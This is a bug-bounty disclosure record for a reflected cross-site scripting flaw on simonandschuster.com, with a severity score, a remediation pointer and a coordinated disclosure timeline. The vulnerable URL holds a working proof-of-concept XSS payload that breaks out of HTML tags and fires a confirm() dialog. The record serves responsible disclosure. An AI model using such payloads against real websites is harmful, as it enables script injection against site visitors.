Lucene search
RootByteOBB:441394HistoryNov 29, 2017 - 5:08 a.m.
simonandschuster.com XSS vulnerability
2017-11-2905:08:00
RootByte
www.openbugbounty.org
11
Open Bug Bounty ID: OBB-441394
| Description | Value |
|---|---|
| Affected Website: | simonandschuster.com |
| Vulnerable Application: | Custom Code |
| Vulnerability Type: | XSS (Cross Site Scripting) / CWE-79 |
| CVSSv3 Score: | 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] |
| Remediation Guide: | OWASP XSS Prevention Cheat Sheet |
Vulnerable URL:
http://www.simonandschuster.com/search/books/_/N-/Ntt-/%22'--!%3E%3C/Title/%3C/Style/%3C/Script/%3C/Textarea/%3C/Noscript/%3C/Pre/%3C/Xmp%3E%3CBody/OnPageShow=confirm('OPENBUGBOUNTY')%3E#
Coordinated Disclosure Timeline
| Description | Value |
|---|---|
| Vulnerability Reported: | 29 November, 2017 05:08 GMT |
| Vulnerability Verified: | 29 November, 2017 05:10 GMT |
| Website Operator Notified: | 29 November, 2017 05:10 GMT |
| Vulnerability Published: | 29 November, 2017 05:10 GMT[without any technical details] |
| Public Disclosure: | 27 February, 2018 05:08 GMT |